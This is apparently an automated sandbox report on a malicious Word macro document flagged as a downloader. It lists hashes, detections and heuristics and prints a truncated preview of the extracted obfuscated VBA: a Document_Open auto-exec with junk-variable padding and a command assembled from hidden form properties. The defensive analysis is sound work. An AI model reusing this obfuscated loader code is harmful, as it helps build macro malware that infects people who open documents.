Office (OLE) malware analysis — malicious · 06ceee2f3aa1ea22

MALICIOUS

Office (OLE)

207.7 KB Created: 2019-12-19 19:38:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 8fd911ceffa1cc75c708f09e374a0f7d SHA-1: c415a9b6989b40ce74a1d028e3be67ffc200be4d SHA-256: 06ceee2f3aa1ea224014e2f2fc2d84e806a21711e0bcca07eb26275585b5b025

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a UserForm hidden-property command stager, indicating an attempt to automatically execute code. The presence of CreateObject and GetObject calls further suggests the execution of arbitrary code. The ClamAV detection 'Doc.Malware.Sagent-7465819-0' strongly suggests malicious intent, likely to download and execute a second-stage payload.

Heuristics 8

ClamAV: Doc.Malware.Sagent-7465819-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-7465819-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13619 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13619 bytes
SHA-256: `ef82a412e71771d0b42798f85a1cda1bfc3f5b069c3adb268214838f45d953aa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Hwdqqnkqpz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Cgyzxgey, 0, 0, MSForms, TextBox" Private Sub Document_open() Kebnuaksgipk = "Vicki" Dim Lasgrersqb As Integer Dim Lpphjqiu As String Mtinnyiympbde = ("Natalie") Dim Vhhdroavt As Double Dim Czzyctumozxd As Boolean Dim Jrobzilycnja As Double Klxpytvjyonhj = Fydrjhwm Dim Giewlpccwccb As Boolean Wxasaoryu = ("Quia.") Dim Pgjhpnzdvrkrn As String Dim Kfnoaeqxulhdl As Double Dim Hoizwjsu As Integer Cymolgnfbdm = "Qui labore molestias voluptatem." Dim Utzipvikn As Boolean Dim Jwinqpslgaxf As String Dim Ifuxkbpwio As Integer Adyxepasepxzp = ("Expedita et voluptas qui quas placeat quia odit amet quisquam.") Dim Aeewnvyhqo As String Wdnntgtp = 548 Jwifkeshui = Orestbcwijr Prbdsvww = 832 Jzqccfajqqfn Vrzbwjspq = "Architecto ab molestiae quam." Dim Nfcckvxyfjmw As String Dim Cdfsgnnba As String Xdvhjyxzvjw = ("Patty") Dim Ailsjwiu As Double Dim Tfnwkmelejnms As Double Dim Vkpxiugfdsx As Boolean Sekvdgcbwcmnr = Oonqjbnltxmc Dim Jdnlitaz As Boolean Lapzicjqwo = ("Laudantium incidunt voluptatem aut quia deleniti.") Dim Fgsuesqxqdo As String Dim Yzcjfrpwdf As Double Dim Ndrnvgzjvx As Boolean Noiiutilpnjc = "Non eaque dolore." Dim Qxbrcbijq As Boolean Dim Kuxpqrbrjvqjg As Double Dim Wxvaupfopc As Boolean Vgjexskj = ("Error aut.") Dim Wywikymaou As Integer Elnqujfginhm = 964 Zqtqwtllbw = Egcpnopdby Xadrcjrjc = 976 End Sub Attribute VB_Name = "Oxsxunkzok" Attribute VB_Base = "0{D3CE7CE8-882C-4BFA-8CDB-3B4D46627047}{2654A822-EA56-4C1F-86B2-D6A2805DC7D9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Xjtlfhjulbv" Function Obhqsekfagdc() Cmlkneyqyilb = "Vickie" Dim Uqlhlvgm As String Dim Aalceebgua As String Jtpxvonz = ("Nihil blanditiis dolor et nobis voluptatibus quidem blanditiis est.") Dim Zipukrcs As Double Dim Wbjmswmtgeh As Boolean Dim Thrsnzszqsw As Boolean Mjujebnw = Jcfycttnw Dim Wmszotuqgjnm As String Czxafatpai = ("Est.") Dim Bqfxeapkqx As String Dim Pisgxxwqpp As Double Dim Vmqkzgmjifre As Integer Enxesexmkx = "Inventore." Dim Rcmatlqkbr As String Dim Ljlsbjqo As String Dim Sjskwuxjctd As Double Jximgoaimds = ("Odio non ut dolores.") Dim Tekagtrcj As String Iovmrppby = 816 Utxkzvgg = Qobszbmj Aubdrtnqxor = 553 Edjnjzqkw = Hwdqqnkqpz.Cgyzxgey Horagids = "Ad in non." Dim Iombmlcqwpqmi As Double Dim Xwormhcabfyo As Boolean Pthvmbba = ("Blanditiis id similique quod et voluptate numquam quaerat.") Dim Ecmatlvgdii As Boolean Dim Adrfnlvnwhq As Boolean Dim Irvmpwuxnkubh As Boolean Sklrdehrvw = Gdhuwuwddlr Dim Rqntwdfvlv As Integer Ydrbaapbhotgp = ("Eos error quasi ut deleniti corrupti architecto.") Dim Llggtsfln As Double Dim Ysitvivyxrfcd As String Dim Qedwhdxw As Boolean Eosdssdhcb = "Facere dolore et tempore." Dim Nslkrbqfjcvs As Integer Dim Hqmubwnj As Integer Dim Dufzbubjexrk As Double Lwgpabszbrkmu = ("Daisy") Dim Agdcqhxv As Double Pbmnejwf = 820 Eqyjpbdsn = Ztjeqoiupoa Kaglxhnhez = 398 Mcrjjyhrt = Edjnjzqkw + Oxsxunkzok.Twitukoytgnx + Oxsxunkzok.Otnntprduj + Oxsxunkzok.Ixvljmxhafr Spmtbiroxknax = "Dolores tenetur nam." Dim Aqlmbdnldmgto As Double Dim Wdrabvwiz As Boolean Asgrzvsp = ("Animi cum reprehenderit sunt possimus.") Dim Bfcuedigupcts As Integer Dim Jwkeehlmxd As Integer Dim Mnlbzliux As String Wrncfkbgz = Qyhkeopse Dim Ywtjochjtm As String Omqfgcwwvng = ("A facere fugiat beatae reprehenderit velit consequatur vel et dolorum.") Dim Toguefkpnt As Integer Dim Vvyyqztvit As Double Dim Jjphumkpwwu As Integer Pohkaasz = "Eos qui libero." Dim Gyxfombeaq As String Dim Vpcuajbmya As String Dim Blmlhsfomyjjw As String Dv ... (truncated)

SHA-256: ef82a412e71771d0b42798f85a1cda1bfc3f5b069c3adb268214838f45d953aa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Hwdqqnkqpz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Cgyzxgey, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Kebnuaksgipk = "Vicki"
Dim Lasgrersqb As Integer
Dim Lpphjqiu As String
Mtinnyiympbde = ("Natalie")
Dim Vhhdroavt As Double
Dim Czzyctumozxd As Boolean
Dim Jrobzilycnja As Double
Klxpytvjyonhj = Fydrjhwm
Dim Giewlpccwccb As Boolean
Wxasaoryu = ("Quia.")
Dim Pgjhpnzdvrkrn As String
Dim Kfnoaeqxulhdl As Double
Dim Hoizwjsu As Integer
Cymolgnfbdm = "Qui labore molestias voluptatem."
Dim Utzipvikn As Boolean
Dim Jwinqpslgaxf As String
Dim Ifuxkbpwio As Integer
Adyxepasepxzp = ("Expedita et voluptas qui quas placeat quia odit amet quisquam.")
Dim Aeewnvyhqo As String
Wdnntgtp = 548
Jwifkeshui = Orestbcwijr
Prbdsvww = 832
Jzqccfajqqfn
   Vrzbwjspq = "Architecto ab molestiae quam."
Dim Nfcckvxyfjmw As String
Dim Cdfsgnnba As String
Xdvhjyxzvjw = ("Patty")
Dim Ailsjwiu As Double
Dim Tfnwkmelejnms As Double
Dim Vkpxiugfdsx As Boolean
Sekvdgcbwcmnr = Oonqjbnltxmc
Dim Jdnlitaz As Boolean
Lapzicjqwo = ("Laudantium incidunt voluptatem aut quia deleniti.")
Dim Fgsuesqxqdo As String
Dim Yzcjfrpwdf As Double
Dim Ndrnvgzjvx As Boolean
Noiiutilpnjc = "Non eaque dolore."
Dim Qxbrcbijq As Boolean
Dim Kuxpqrbrjvqjg As Double
Dim Wxvaupfopc As Boolean
Vgjexskj = ("Error aut.")
Dim Wywikymaou As Integer
Elnqujfginhm = 964
Zqtqwtllbw = Egcpnopdby
Xadrcjrjc = 976
End Sub

Attribute VB_Name = "Oxsxunkzok"
Attribute VB_Base = "0{D3CE7CE8-882C-4BFA-8CDB-3B4D46627047}{2654A822-EA56-4C1F-86B2-D6A2805DC7D9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Xjtlfhjulbv"
Function Obhqsekfagdc()
   Cmlkneyqyilb = "Vickie"
Dim Uqlhlvgm As String
Dim Aalceebgua As String
Jtpxvonz = ("Nihil blanditiis dolor et nobis voluptatibus quidem blanditiis est.")
Dim Zipukrcs As Double
Dim Wbjmswmtgeh As Boolean
Dim Thrsnzszqsw As Boolean
Mjujebnw = Jcfycttnw
Dim Wmszotuqgjnm As String
Czxafatpai = ("Est.")
Dim Bqfxeapkqx As String
Dim Pisgxxwqpp As Double
Dim Vmqkzgmjifre As Integer
Enxesexmkx = "Inventore."
Dim Rcmatlqkbr As String
Dim Ljlsbjqo As String
Dim Sjskwuxjctd As Double
Jximgoaimds = ("Odio non ut dolores.")
Dim Tekagtrcj As String
Iovmrppby = 816
Utxkzvgg = Qobszbmj
Aubdrtnqxor = 553
Edjnjzqkw = Hwdqqnkqpz.Cgyzxgey
   Horagids = "Ad in non."
Dim Iombmlcqwpqmi As Double
Dim Xwormhcabfyo As Boolean
Pthvmbba = ("Blanditiis id similique quod et voluptate numquam quaerat.")
Dim Ecmatlvgdii As Boolean
Dim Adrfnlvnwhq As Boolean
Dim Irvmpwuxnkubh As Boolean
Sklrdehrvw = Gdhuwuwddlr
Dim Rqntwdfvlv As Integer
Ydrbaapbhotgp = ("Eos error quasi ut deleniti corrupti architecto.")
Dim Llggtsfln As Double
Dim Ysitvivyxrfcd As String
Dim Qedwhdxw As Boolean
Eosdssdhcb = "Facere dolore et tempore."
Dim Nslkrbqfjcvs As Integer
Dim Hqmubwnj As Integer
Dim Dufzbubjexrk As Double
Lwgpabszbrkmu = ("Daisy")
Dim Agdcqhxv As Double
Pbmnejwf = 820
Eqyjpbdsn = Ztjeqoiupoa
Kaglxhnhez = 398
Mcrjjyhrt = Edjnjzqkw + Oxsxunkzok.Twitukoytgnx + Oxsxunkzok.Otnntprduj + Oxsxunkzok.Ixvljmxhafr
   Spmtbiroxknax = "Dolores tenetur nam."
Dim Aqlmbdnldmgto As Double
Dim Wdrabvwiz As Boolean
Asgrzvsp = ("Animi cum reprehenderit sunt possimus.")
Dim Bfcuedigupcts As Integer
Dim Jwkeehlmxd As Integer
Dim Mnlbzliux As String
Wrncfkbgz = Qyhkeopse
Dim Ywtjochjtm As String
Omqfgcwwvng = ("A facere fugiat beatae reprehenderit velit consequatur vel et dolorum.")
Dim Toguefkpnt As Integer
Dim Vvyyqztvit As Double
Dim Jjphumkpwwu As Integer
Pohkaasz = "Eos qui libero."
Dim Gyxfombeaq As String
Dim Vpcuajbmya As String
Dim Blmlhsfomyjjw As String
Dv
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.